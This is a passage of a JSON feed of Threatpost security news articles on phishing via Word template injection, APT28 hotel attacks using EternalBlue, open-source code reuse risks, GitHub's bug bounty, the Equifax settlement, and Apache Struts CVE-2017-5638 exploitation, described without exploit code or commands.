"THREATPOST:0FC293825070B81036932BDB41D793B5", "href": "https://threatpost.com/dyn-confirms-ddos-attack-affecting-twitter-github-many-others/121438/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:53:25", "description": "Days after news broke last week that advanced, persistent threat actors penetrated nuclear facilities, researchers are explaining techniques used by adversaries to gain toeholds in similar targets in energy. Cisco Talos reported Friday that email-based attacks, leveraging template injection techniques, targeting nuclear facilities and others have been ongoing since May.\n\n\u201cTalos has observed attackers targeting critical infrastructure and energy companies around the world, primarily in Europe and the United States. These attacks target both the critical infrastructure providers, and the vendors those providers used to deliver critical services,\u201d [researchers wrote on Friday](<http://blog.talosintelligence.com/2017/07/template-injection.html#more>).\n\nAdversaries are leveraging classic Word document-based phishing attacks, they said. However, the Word document attachments used in the phishing campaigns do not contain malicious VBA macros or embedded scripting. Instead, attachments attempt to download a malicious template file over a Server Message Block (SMB) connection so that the user\u2019s credentials can be harvested, researchers said.\n\nCisco Talos did not claim this specific attack was used against Wolf Creek Nuclear Operating Corporation or in connection with any specific attack cited in a joint report issued by the Department of Homeland Security and the Federal Bureau of Investigation last week. Neither did researchers claim attacks had ever led to a hacker breaching or disrupting the core systems controlling operations at an energy plant.\n\n\u201cOne objective of this most recent attack appears to be to harvest credentials of users who work within critical infrastructure and manufacturing industries,\u201d Talos wrote.\n\nTargeted phishing attacks included DOCX type documents delivered as attachments under the guise of being an environmental report or a resume. While no malicious macros or scripting is embedded in the document, when a user opens it, a request is made via the SMB protocol for a template, as such \u201cContacting:\\\\\\ . . . \\Template.dotm.\u201d\n\n\u201cThe document was trying to pull down a template file from a particular IP,\u201d they noted. That connection was not via TCP 80 (often used for C2 communications), rather the SMB request was via TCP 445, a traditional Microsoft networking port.\n\nWithin the sandboxed VM \u201ca WebDAV connection was attempted over a SMB session when requesting the template.\u201d\n\nWebDAV is a Web-based Distributed Authoring and Versioning extension to the HTTP protocol that allows users to collaboratively edit and manage files on a remote server, according to [WebDAV Working Group](<http://www.webdav.org/>).\n\nUsing the WebDAV connection, the DOCX file requests a specific Relationship ID that is present in word/_rels/settings.xml.rels, or the XML instructions. According to researchers, the Relationship ID is identical to a phishing tool named Phishery, which uses the exact same ID in its template injection.\n\nPhishery is known as a credential harvester with a Word document template URL injector. According the [GitHub tool description](<https://github.com/ryhanson/phishery>), \u201cPhishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication.\u201d Once the target opens the Word document attachment sent in the phishing email, the template request reaches out to a Phishery server that triggers a dialogue box on the victim\u2019s computer requesting a Windows username and password.\n\nTalos researchers said Phishery was not used in the attacks it observed. It theorizes attacks may have used modified Phishery code or used the same Relationship ID to thwart analysis.\n\nIn the sample Talos examined, unlike with Phishery that prompted users for credentials, instead a template file is requested from a third-party server with no Basic Authentication prompt for credentials. \u201cSuch a prompt was not needed nor seen for samples requesting the template over SMB,\u201d they wrote.\n\nOnce the target opens the Word document a template request is made to a third-party server that initiates the download of a potentially rogue template. \u201cThe attachment instead tries to download a template file over an SMB connection so that the user\u2019s credentials can be silently harvested. In addition, this template file could also potentially be used to download other malicious payloads to the victim\u2019s computer,\u201d researchers said.\n\nTalos explains that the attacker\u2019s SMB server was down when it analyzed samples, making it impossible to determine the payloads (if any) that could have been dropped by the template being downloaded. \u201cForcing SMB requests to an external server has been a known security vulnerability for many years. Without further information it is impossible to conclude what the true scope of this attack was or what malicious payloads could have been involved.\u201d\n\nAccording to a _[New York Times](<https://www.nytimes.com/2017/07/06/technology/nuclear-plant-hack-report.html>)_ report of attacks against Wolf Creek Nuclear Operating Corporation included phishing lures with highly targeted email messages containing fake resumes for control engineering jobs.\n\nLate last month, the U.S. government warned critical infrastructure companies of hacking campaigns against nuclear and energy sector. \u201cHistorically, cyber actors have strategically targeted the energy sector with various goals ranging from cyber espionage to the ability to disrupt energy systems in the event of a hostile conflict,\u201d the report said.\n", "cvss3": {}, "published": "2017-07-10T14:34:03", "type": "threatpost", "title": "Energy, Nuclear Targeted with Template Injection Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-07-10T18:34:03", "id": "THREATPOST:6495B216452F8FF8CDF9A8F13AD41168", "href": "https://threatpost.com/energy-nuclear-targeted-with-template-injection-attacks/126727/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:10", "description": "Mike Mimoso and Chris Brook discuss the news of the week, including a password issue at Github, the xDedic marketplace, another Flash zero day, and how the poorly the FBI is doing with facial recognition software.\n\nDownload: [Threatpost_News_Wrap_June_17_2016.mp3](<http://traffic.libsyn.com/digitalunderground/Threatpost_News_Wrap_June_17_2016.mp3>)\n\nMusic by Chris Gonsalves\n\n[![itunessub](https://media.threatpost.com/wp-content/uploads/sites/103/2014/11/07011443/itunessub.jpg)](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2016-06-17T11:15:12", "type": "threatpost", "title": "On xDedic, a Flash Zero Day, Facial Recognition, and More", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-06-28T13:58:31", "id": "THREATPOST:962241D6EFDC7F82640BA9171D82D0B7", "href": "https://threatpost.com/threatpost-news-wrap-june-17-2016/118745/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:54:19", "description": "The amount of insecure software tied to reused third-party libraries and lingering in applications long after patches have been deployed is staggering. It\u2019s a habitual problem perpetuated by developers failing to vet third-party code for vulnerabilities, and some repositories taking a hands-off approach with the code they host.\n\nThis scenario allows attackers to target one overlooked component flaw used in millions of applications instead of focusing on a single application security vulnerability. The real-world consequences have been demonstrated in the past few years with the [Heartbleed](<https://threatpost.com/openssl-fixes-tls-vulnerability/105300/>) vulnerability in OpenSSL, [Shellshock](<https://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521/>) in GNU Bash, and a deserialization vulnerability exploited in a recent high-profile attack against the [San Francisco Municipal Transportation Agency](<https://threatpost.com/hackers-make-new-claim-in-san-francisco-transit-ransomware-attack/122138/>). These are three instances where developers reuse libraries and frameworks that contain unpatched flaws in production applications.\n\nSecurity researchers at Veracode estimate that 97 percent of Java applications it tested included at least one component with at least one known software vulnerability. \u201cThe problem isn\u2019t limited to Java and isn\u2019t just tied to obscure projects,\u201d said Tim Jarrett senior director of security, Veracode. \u201cPick your programming language.\u201d Gartner, meanwhile, estimates that by 2020, [99 percent of vulnerabilities](<http://www.gartner.com/smarterwithgartner/top-10-security-predictions-2016/>) exploited will be ones known by security and IT professionals for at least one year.\n\n**Code Reuse Saves Time, Invites Bugs**\n\nAccording to security experts, the problem is two-fold. On one hand, developers use reliable code that at a later date is found to have a vulnerability. Second, insecure code is used by a developer who doesn\u2019t exercise due diligence on the software libraries used in their project.\n\n\u201cThey\u2019ve heard the warnings and know the dangers, but for many developers open source and third-party components can be a double-edge sword \u2013 saving time but opening the door to bugs,\u201d said Derek Weeks, vice president and DevOps advocate at Sonatype.\n\n[![sonatype](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232110/sonatype-150x150.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232110/sonatype.png>)In an analysis of 25,000 applications, Sonatype found that seven percent of components had at least one security defect tied to the use of an insecure software component.\n\nRepositories GitHub, Bitbucket, Python Package Index and NuGet Gallery are essential tools helping developers find pre-existing code that adds functionality for their software projects without having to reinvent the wheel. Java application developers, for example, rely on pre-existing frameworks to handle encryption, visual elements and libraries for handling data.\n\n\u201cSoftware is no longer written from scratch,\u201d Weeks said. \u201cNo matter how new and unique the application, 80 percent of the code used in a software application relies on third-party libraries or components.\u201d\n\nHe said enterprises are more reliant on the software supply chain than ever before. But he says many of the go-to open-source repositories that make up that supply chain are not vetted libraries of reliable code. Rather, they are warehouses with a varying percentage of outdated projects with security issues.\n\nAccording to an analysis of Sonatype\u2019s own Central Repository in 2015, developers had made 31 billion download requests of open source and third-party software components, compared to 17 billion requests the year before. And when Sonatype analyzed its own code library, it found 6.1 percent of code downloaded from its Central Repository had a known security defect.\n\nWeeks says Sonatype\u2019s is doing better than other repositories that offer no tools, no guidance and no red flags to prevent developers from using frameworks with faulty code. \u201cThere is no Good Housekeeping Seal of Approval for third-party code.\u201d\n\n\u201cFaulty code can easily spawn more problems down the road for developers,\u201d said Stephen Breen, a principal consultant at NTT Com Security. \u201cEven when development teams have the best intentions, it\u2019s easy for developers working under tight deadlines to not properly vet the third-party code used in their software.\u201d\n\nBreen said when insecure code is unknowingly used to build a component within a software program, problems snowball when that component is used inside other larger components. One example of vulnerable third-party code reused repeatedly is a deserialization flaw in Apache Commons Collections (commons-collections-3.2.1.jar) \u2013 first reported in 2015 and patched in November of the same year.\n\n[![threatpost_veracode_top_java_vulns](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232053/Threatpost_Veracode_Top_Java_vulns-1024x656.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232053/Threatpost_Veracode_Top_Java_vulns.png>)\n\nSource: Veracode\n\nJarrett found there are still 1,300 instances of the old vulnerable version of the Commons Collections lurking inside Java applications using Spring and Hibernate libraries and hosted across multiple open source code repositories.\n\n\u201cThe developer knows they are picking Spring or Hibernate for their development project. They don\u2019t take it to the next level and realize they are also getting Common Collections,\u201d Jarrett said. \u201cThat Common Collections library is then used by thousands more projects.\u201d\n\n[![apache](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232108/apache-150x150.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232108/apache.png>)According to Veracode, Apache Commons Collections is the sixth-most common component used in Java applications. It found that the unpatched versions of the software was in 25 percent of 300,000 Java applications scanned. Even more challenging for developers is updating those applications that are using the vulnerable version of libraries and frameworks since flaws were patched.\n\n\u201cThink of it like a faulty airbag. Carmakers used those faulty airbags in millions of vehicles. Now it\u2019s the carmaker on the hook to fix the problem, not the airbag maker,\u201d Jarrett said.\n\n**Leaky Apps, Bad Crypto, Injection Flaws Galore**\n\nVeracode said the Apache Common Collection example is the tip of the iceberg. When Veracode examined vulnerabilities tied to insecure code it found application information leakage, where user or application data can be leveraged by an attacker, is the most prevalent type of vulnerability, accounting for 72 percent of third-party code flaws. Second are cryptographic issues representing 65 percent of vulnerabilities. That was followed by Carriage Return Line Feed (CRLF) injection flaws and cross site scripting bugs.\n\n[![threatpost_veracode_top_vuln_cats](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232057/Threatpost_Veracode_Top_vuln_cats-1024x400.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232057/Threatpost_Veracode_Top_vuln_cats.png>)\n\nSource: Veracode\n\nCompounding the problem is an increased dependency on open-source components used in a wide variety of software products. The federal government is typical. It has an open-source-first policy as do many private companies. Relying on third-party libraries shortens development time and can improve the safety and quality of their software projects, Weeks said.\n\n\u201cNot only does code reuse save time but it also allows developers to be more innovative as they focus on creating new functionality and not writing encryption libraries from scratch,\u201d Weeks said. Done correctly, code reuse is a developer\u2019s godsend, he said.\n\nFor those reasons, security experts say it\u2019s time for the industry to stop and consider where code originates. Sonatype, which markets and sells code verification services, promotes the idea of documenting software\u2019s supply chain with what it calls a \u201csoftware bill of materials.\u201d That way developers can better scrutinize open-source frameworks before and after they are used; making it easier to update those applications that are using vulnerable old versions of libraries.\n\nSonatype said it found one in 16 components it analyzed had a vulnerability that was previously documented, verified and with additional information available on the Internet. \u201cI can\u2019t imagine any other industry where it\u2019s okay that one in 16 parts have known defects.\u201d\n\nThe problem is that among developers there is a mix of denial and ignorance at play. \u201cDevelopers choose component parts, not security,\u201d Weeks said. It should be the other way around.\n\n\u201cIf we are aware of malicious or bad libraries or code, of course we want to warn our users,\u201d said Logan Abbott, president of SourceForge, a software and code repository. \u201cWe scan binaries for vulnerabilities, but we don\u2019t police any of the code we host.\u201d\n\n**Repositories Say: \u2018We\u2019re Just the Host\u2019**\n\nRepositories contacted by Threatpost say their platforms are a resource for developers akin to cloud storage services that allow people to store and share content publicly or privately. They don\u2019t tell users what they can and cannot host with their service.\n\nThey say rooting out bugs in software should be on shoulders of developers \u2013 not repositories. Writing good vulnerability-free code starts at getting good code from healthy repositories with engaged users.\n\n[![bitbucket](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232105/bitbucket-150x150.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232105/bitbucket.png>)\u201cBitbucket is to a developer like Home Depot is to a carpenter,\u201d said Rahul Chhabria, product manager for Atlassian Bitbucket. \u201cWe\u2019ve built a hosting service with a variety of tools to help developers execute on their vision.\u201d\n\nChhabria said Bitbucket offers a range of tools to help sniff out bad or insecure components such as the third-party tool SourceClear for scanning dependency chains. It also offers Bitbucket that it says allows for team development of software projects and simplifies peer review. Another features, Bitbucket Pipelines, is also designed to help developers ship high quality code.\n\nGitHub is one of the largest repositories; it hosts 49 million public and private projects for its 18 million users. It does not scan or red flag insecure code hosted on its platform, according to Shawn Davenport, VP of security at GitHub. Instead developers can use third party-tools such as Gemnasium, Brakeman and Code Climate for static and dependency analysis.\n\n[![github](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232101/github-150x150.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232101/github.png>)\u201cThere is a lot of hidden risk out there in projects,\u201d Davenport said. \u201cWe do our best to make sure our developers know what tools are available to them to vet their own code.\u201d He estimates a minority GitHub developers take advantage of software scanning and auditing tools. \u201cUnfortunately security isn\u2019t a developers first priority.\u201d\n\nOther repositories told Threatpost they intentionally take a hands-off approach and say expecting them to police their own software isn\u2019t feasible, not part of their mission and nothing they plan to do. They point out, flawed or not, developers want access to all code \u2013 even older components.\n\n\u201cAn implementation of a library in one framework might not be a security risk at all,\u201d Breen said. He points out developers often temporarily revert to those old libraries as stopgaps should an updated version break a project.\n\n**Automated Scanning to the Rescue?**\n\nOne attempt at nipping the problem at the bud is the used of automated security vulnerability and configuration scanning for open source components. By 2019, more than 70 percent of enterprise DevOps initiatives will incorporate automated scanning, according to Gartner. Today only 10 percent of packages are scanned.\n\n[![nodejs](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232050/nodejs-150x150.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232050/nodejs.png>)The Node.js Foundation, an industry consortium designed to promote the Node.js platform, relies on a more community-based approach via the Node.js Security Project. The goal is to provide developers a process for discovering and disclosing security vulnerabilities found in the Node.js module ecosystem. According to Node.js the approach is a hybrid solution that consists of a database of vulnerabilities and a community communication channel for vetting and disclosing vulnerable code.\n\n\u201cIt\u2019s not a story about security professionals solving the problem, it\u2019s about how we empower development with the right information about the (software) parts they are consuming,\u201d Weeks said. \u201cIn this case, the heart of the solution lies with development, and therefore requires a new approach and different thinking.\u201d\n", "cvss3": {}, "published": "2016-12-15T10:00:39", "type": "threatpost", "title": "Code Reuse a Peril for Secure Software Development", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-12-27T13:45:57", "id": "THREATPOST:87897784F4B89A5B9E8CE18E2324CC70", "href": "https://threatpost.com/code-reuse-a-peril-for-secure-software-development/122476/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:53:16", "description": "Russian-speaking cyberespionage group APT28, also known as Sofacy, is believed to be behind a series of attacks last month against travelers staying in hotels in Europe and the Middle East. APT28 notably used the NSA hacking tool EternalBlue as part of its scheme to steal credentials from business travelers, according to a [report](<https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html>) released Friday by security firm FireEye.\n\nOne of the goals of the attack is to trick guests to download a malicious document masquerading as a hotel reservation form that, if opened and macros are enabled, installs a dropper file that ultimately downloads malware called Gamefish. Gamefish establishes a foothold in targeted systems as a way to install the open source tool called Responder, according to FireEye.\n\n\u201cOnce inside the network of a hospitality company, APT28 sought out machines that controlled both guest and internal Wi-Fi networks,\u201d wrote authors of the report Lindsay Smith and Benjamin Read, both researchers with FireEye\u2019s cyber espionage team.\n\n\u201cTo spread through the hospitality company\u2019s network, APT28 used a version of the EternalBlue SMB exploit. This was combined with the heavy use of py2exe to compile Python scripts. This is the first time we have seen APT28 incorporate this exploit into their intrusions,\u201d researchers said.\n\nFireEye said APT28\u2019s objective was to steal credentials from business travelers using hotel Wi-Fi networks, which the researchers said they did not observe. FireEye does cite a 2016 hotel attack by APT28 with a similar modus operandi. In that incident, a hotel guest\u2019s username and password were stolen while they used the Wi-Fi network. Within 12 hours the victim\u2019s business network was compromised by someone using their credentials.\n\nOnce the foothold is established in the hotel\u2019s wi-fi system, hackers deployed the Responder tool in order to facilitate NetBIOS Name Service (NBT-NS) poisoning. \u201cThis technique listens for NBT-NS (UDP/137) broadcasts from victim computers attempting to connect to network resources. Once received, Responder masquerades as the sought-out resource and causes the victim computer to send the username and hashed password to the attacker-controlled machine,\u201d researchers said.\n\nThat username and hashed password from hotel guests is cracked offline and later used to escalate privileges in the victim\u2019s network, according to FireEye.\n\nIn all, hotels in seven European countries and one Middle Eastern country were targeted. \u201cBusiness and government personnel who are traveling, especially in a foreign country, often rely on systems to conduct business other than those at their home office, and may be unfamiliar with threats posed while abroad,\u201d researchers wrote.\n\nAPT28, or Sofacy, is the group implicated by a December [DHS report](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>) related to U.S. election hacks. In a report [released earlier this week](<https://threatpost.com/updates-to-sofacy-turla-highlight-2017-q2-apt-activity/127297/>), Kaspersky Lab said the group has adopted new macro techniques and continued to find new targets such as the French political party.\n\n\u201cThese incidents show a novel infection vector being used by APT28. The group is leveraging less secure hotel Wi-Fi networks to steal credentials and a NetBIOS Name Service poisoning utility to escalate privileges,\u201d FireEye wrote. \u201cPublicly accessible Wi-Fi networks present a significant threat and should be avoided whenever possible.\u201d\n", "cvss3": {}, "published": "2017-08-12T08:00:32", "type": "threatpost", "title": "APT28 Using EternalBlue to Attack Hotels in Europe, Middle East", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-08-12T11:12:17", "id": "THREATPOST:31661FC1D8CDC4988A6B8EB802933A7B", "href": "https://threatpost.com/apt28-using-eternalblue-to-attack-hotels-in-europe-middle-east/127419/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Almost a year to the day since [Github announced its bug bounty program](<http://threatpost.com/github-launches-bug-bounty-program/103974>), the Git repository said yesterday that it will double its maximum payout to $10,000.\n\nBen Toews, a GitHub staffer, said yesterday that since the launch of the GitHub Security Bug Bounty, 73 previously unknown vulnerabilities have been patched.\n\n\u201cOf 1,920 submissions in the past year, 869 warranted further review, helping us to identify and fix vulnerabilities fitting nine of the OWASP top 10 vulnerability classifications,\u201d Toews said in a post to the GitHub blog. He added that GitHub has paid out $50,100 in bounties to 33 different researchers reporting 57 medium- to high-risk security issues.\n\n\u201cWe saw some incredibly involved and creative vulnerabilities reported,\u201d Toews said.\n\nGitHub pays bounties for verifiable bugs in the GitHub API, GitHub Gist, and the GitHub.com website. Until yesterday, rewards ranged from $100 to $5,000 in each [open bounty](<https://bounty.github.com/index.html#open-bounties>). The API, for example, exposes a lot of the website\u2019s functionality and data so it was a priority. The Gist is a GitHub code-sharing product built on Ruby on Rails and other open source components; bounties here vary depending on certain factors, GitHub said. As for the website, bounties there too depend on different factors and risks.\n\nBug bounties are an efficient and economical way for under-resourced organizations to expose applications to researchers who can help identify and fix potentially critical security vulnerabilities. Larger organizations such as [Facebook have prominent in-house bounties](<http://threatpost.com/facebook-bug-bounty-submissions-dramatically-increase/105235>). Facebook\u2019s, for example, paid out $1.5 million in 2013 with submissions growing almost 250 percent year over year.\n\nOthers are taking advantage of [bug bounty platforms offered by providers](<http://threatpost.com/crowdsourcing-finding-its-security-sweet-spot/106848>) such as BugCrowd and HackerOne. In these cases, providers essentially crowdsource vulnerability discovery and management. A self-contained community hammers away at applications on these respective platforms and earn bounties for bugs that meet certain criteria.\n\n> Git Hub will double its maximum bug bounty payout to $10,000\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fgithub-doubles-down-on-maximum-bug-bounty-payouts%2F110730%2F&text=Git+Hub+will+double+its+maximum+bug+bounty+payout+to+%2410%2C000>)\n\nGitHub\u2019s Toews pointed out one of GitHub\u2019s top bug submitters, Aleksandr Dobkin, who found a troubling cross-site scripting flaw that when combined with a zero day in Google\u2019s Chrome browser achieved a bypass of GitHub\u2019s content security policy.\n\nGitHub maintains a [leaderboard](<https://bounty.github.com/index.html>) of its top bug hunters. The system requires that researchers who find vulnerabilities in a GitHub property not disclose it before a patch has been released and implemented. Researchers are also not allowed to use automated scanners against GitHub, or access another user\u2019s account as part of the program.\n\nToews said vulnerabilities can be submitted [here](<https://bounty.github.com/submit-a-vulnerability.html>), and should also be accompanied by proper documentation that will allow GitHub to reproduce the vulnerability.\n", "cvss3": {}, "published": "2015-01-29T11:21:40", "type": "threatpost", "title": "GitHub Doubles Maximum Bug Bounty Payouts", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-01-30T20:11:49", "id": "THREATPOST:812C0E3D711FC77AF4348016C7A094D2", "href": "https://threatpost.com/github-doubles-down-on-maximum-bug-bounty-payouts/110730/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-04-11T11:42:25", "description": "Equifax will pay as much as $700 million to settle federal and state investigations on the heels of its infamous 2017 breach, which exposed the data of almost 150 million customers.\n\nThe consumer credit reporting agency on Monday [said](<https://investor.equifax.com/news-and-events/news/2019/07-22-2019-125543228>) it will dish out $300 million to cover free credit monitoring services for impacted consumers, $175 million to 48 states in the U.S, and $100 million in civil penalties to the Consumer Financial Protection Bureau (CFPB). If the initial amount does not cover consumer losses, the company may need to pay an additional $125 million.\n\n\u201cCompanies that profit from personal information have an extra responsibility to protect and secure that data,\u201d said Federal Trade Commission (FTC) Chairman Joe Simons [in a statement](<https://www.ftc.gov/news-events/press-releases/2019/07/equifax-pay-575-million-part-settlement-ftc-cfpb-states-related?utm_source=slider>). \u201cEquifax failed to take basic steps that may have prevented the breach that affected approximately 147 million consumers. This settlement requires that the company take steps to improve its data security going forward, and will ensure that consumers harmed by this breach can receive help protecting themselves from identity theft and fraud.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nEquifax, which handles data associated with more than 820 million customers and 91 million businesses worldwide, has been under public scrutiny since September 2017 when [it disclosed](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) a data breach that impacted almost 150 million Americans. The attackers managed to [access information](<https://threatpost.com/equifax-data-nation-state/141929/>) containing Social Security numbers, birth dates, addresses, and some driver\u2019s license numbers. Equifax said it discovered the intrusion on July 29, meaning attackers apparently had access to the company\u2019s files for nearly 12 weeks.\n\nAfter the data breach, Equifax was hit by multiple lawsuits, as well as investigations by the FTC, the CFPB, the Attorneys General of 48 states, and more.\n\n[![Equifax FTC](https://media.threatpost.com/wp-content/uploads/sites/103/2019/07/22101929/eqfx-socmed-summary-300x188.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/07/22101929/eqfx-socmed-summary.png>)\n\nLawsuits claimed that Equifax failed to patch its network in March 2017 after being alerted of a [critical security flaw](<https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/>) (an Apache Struts vulnerability, CVE-2017-5638) in its Equifax Automated Consumer Interview System database (which handles inquiries from consumers about their personal credit data). This vulnerability was ultimately exploited by bad actors, leading to the data breach.\n\nAs part of the agreement, Equifax also said it will take steps to enhance its information security and technology program, as well as make payments totaling $290.5 million to state and federal regulatory agencies to pay attorneys\u2019 fees and costs in the multi-district litigation.\n\nIn the past month, a slew of fines and penalties have been imposed that were tied privacy and data breach incidents. Earlier in July, the [FTC slapped](<https://threatpost.com/privacy-experts-facebooks-5b-fine/146478/>) a $5 billion fine on Facebook for privacy violations following its Cambridge Analytica incident. Also hit with security-related fines in July were [Marriott](<https://threatpost.com/marriott-123m-fine-data-breach/146320/>) ($123 million) and [British Airways](<https://threatpost.com/post-data-breach-british-airways-slapped-with-record-230m-fine/146272/>) ($230 million).\n\nWhile opinions are mixed about the appropriate penalty for these companies and Equifax, security experts for their part hope that other companies will take note of the fines when it comes to data security and privacy.\n\n\u201cI\u2019m far from an Equifax apologist, but the truth is it could have been anyone,\u201d Adam Laub, chief marketing officer at STEALTHbits Technologies said in an email. \u201cIt\u2019s not an excuse, but rather the reality we live in. The best outcome isn\u2019t Equifax making the situation right \u2013 although that is important for all of those affected \u2013 it\u2019s everyone else learning that the price to be paid outweighs the inconvenience of ensuring proper measures are taken to secure the data that puts them at risk in the first place. And it\u2019s got to be from the ground up too. There\u2019s no silver bullet.\u201d\n\n**_Interested in more on patch management? Don\u2019t miss our free live _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)**_, \u201c_****_Streamlining Patch Management,\u201d on Wed., July 24, at 2:00 p.m. EDT. Please join Threatpost editor Tom Spring and a panel of patch experts as they discuss the latest trends in Patch Management, how to find the right solution for your business and what the biggest challenges are when it comes to deploying a program. _****_[Register and Learn More](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)_**\n", "cvss3": {}, "published": "2019-07-22T14:31:39", "type": "threatpost", "title": "Equifax to Pay $700 Million in 2017 Data Breach Settlement", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-07-22T14:31:39", "id": "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "href": "https://threatpost.com/equifax-to-pay-700-million-in-2017-data-breach-settlement/146579/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:59", "description": "Public attacks and scans looking for exposed Apache webservers have ramped up dramatically since Monday when a vulnerability in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nThe vulnerability, [CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>), was already under attack in the wild prior to Monday\u2019s disclosure, but since then, the situation has worsened and experts fear it\u2019s going to linger for a while.\n\n\u201cThe second someone starts working on a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>), it\u2019s a ramp-up for rapid exploitation by a large number of people,\u201d said Craig Williams, senior technical leader for Cisco\u2019s Talos research outfit. \u201cWe\u2019re basically seeing a huge number of people continue to exploit the vulnerability. That\u2019s likely going to continue to increase. I think what we\u2019re also going to see is people going to try to scan for the vulnerability.\u201d\n\nThe flaw lives in the Jakarta Multipart parser upload function in Apache. It allows an attacker to easily make a maliciously crafted request (a malicious Content-Type value) to an Apache webserver and have it execute. Struts 2.3.5 to Struts 2.3.31 are affected as are Struts 2.5 to 2.5.10; admins are urged to upgrade immediately to [Struts 2.3.32](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32>) or [2.5.10.1](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1>).\n\nTalk of the vulnerability surfaced on Chinese forums, according to Vincente Motos, who posted an advisory on the [HackPlayers](<http://www.hackplayers.com/2017/03/exploit-rce-para-apache-struts-cve-2017-5638.html>) website. Motos said a notorious Apache Struts hacker known as Nike Zheng posted a public proof-of-concept exploit demonstrating the simplicity in which an attacker could inject operating system commands.\n\nThe attacks are particularly risky to anyone running their Apache webservers as root, which is not a suggested practice. Williams said it\u2019s unclear whether an attacker can benignly scan for vulnerable servers in order to determine the version and context under which Struts is running, whether as Apache or root, for example. But as with some older internet-wide bugs, there are a large number of scans happening.\n\n\u201c[Attacks] look like requests to a webserver with a malformed piece,\u201d Williams said. \u201cUnless you\u2019re looking for it, it\u2019s easy not to see the malformed content type.\u201d\n\nAn attacker, he said, would need to just modify one line depending on the operating system the target is running, Windows or Linux, and have it download a malicious binary from the web.\n\n\u201cUnfortunately, due to the nature of command-line injections like this, it\u2019s very easy to modify,\u201d Williams said. \u201cAnd that\u2019s why I think we\u2019re going to continue to see exploitation rise for the foreseeable future.\u201d\n\nThe risks are severe for an organization running an exposed Apache server if it\u2019s compromised.\n\n\u201cThe sky\u2019s the limit,\u201d Williams said. \u201cIf I\u2019m a bad guy, depending on what my game is, I can take over your webserver and use that to move laterally through your network. If I\u2019m super insidious, I can use that to look for your domain controller and if I can find a way to compromise your password hashes, say from the Linux server I compromised, I can possibly log in to your domain controller and use that to push malware to all your machines. I could ransom off your webserver, all kinds of terrible things.\u201d\n\nWilliams said [Cisco has observed](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) that the majority of public attacks feature a number of Linux bots used for DDoS attacks taking advantage of this vulnerability, along with an IRC bouncer, and a malware sample related to the bill gates botnet.\n\nWilliams cautioned as well that connected devices in the IoT space could also be a major concern, since Struts 2 likely runs there.\n\n\u201cI\u2019m going to guess there\u2019s a reasonable number of devices running it, and due to the nature of IoT, those aren\u2019t going to be patched any time soon. So this is going to be an issue for the foreseeable future.\u201d\n\nGiven the availability of patches and detection rules, it\u2019s likely that public attacks are going to be largely mitigated and as more detection rules surface, public exploits should be less useful to attackers.\n\n\u201cDue to the fact that it\u2019s relatively easy to go inside and modify an attack, it\u2019s going to be bad and it\u2019s going to plague us for some time,\u201d Williams said. \u201cGood news is that detecting it is not that difficult.\u201d\n", "cvss3": {}, "published": "2017-03-09T12:25:46", "type": "threatpost", "title": "Attacks Heating Up Against Apache Struts 2 